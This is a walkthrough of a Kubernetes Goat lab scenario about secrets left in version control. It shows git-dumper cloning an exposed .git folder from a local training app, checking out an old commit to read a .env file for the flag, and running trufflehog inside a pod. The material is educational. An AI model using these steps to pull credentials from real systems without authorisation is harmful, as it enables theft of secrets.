Sensitive keys in code bases

Scenario Information

Developers tend to commit sensitive information to version control systems. As we are moving towards CI/CD and GitOps systems, we tend to forgot identifying sensitive information in code and commits. Let's see if we can find something cool here!

Scenario 1 Entry

Scenario Solution

Method 1

After reading the scenario description and application information. We have performed some discovery and analysis, then identified that it has .git folder exposed with in the application.

Scenario 1 Git folder found

  • Clone the git repository locally by running the following command. Ensure you have setup git-dumper locally before running the below command
python3 git-dumper.py http://localhost:1230/.git k8s-goat-git

Scenario 1 git-dumper clone locally

  • Now check the git log information
cd k8s-goat-git
git log

Scenario 1 Git log history

  • Checkout to old commit to specific version
git checkout 128029d89797957957b2a7198d8d159b239b34eb
ls -la
cat .env

Scenario 1 Gain access to flag

Method 2

Sometimes, we ideally have access to the pods or containers access and we can also perform analysis from with in the container as well.

export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")
kubectl exec -it $POD_NAME -- sh

Scenario 1 access to pod

  • Then we can perform analysis on .git folder by running utilities like trufflehog
trufflehog .

Scenario 1 trufflehog discovery

Miscellaneous

TBD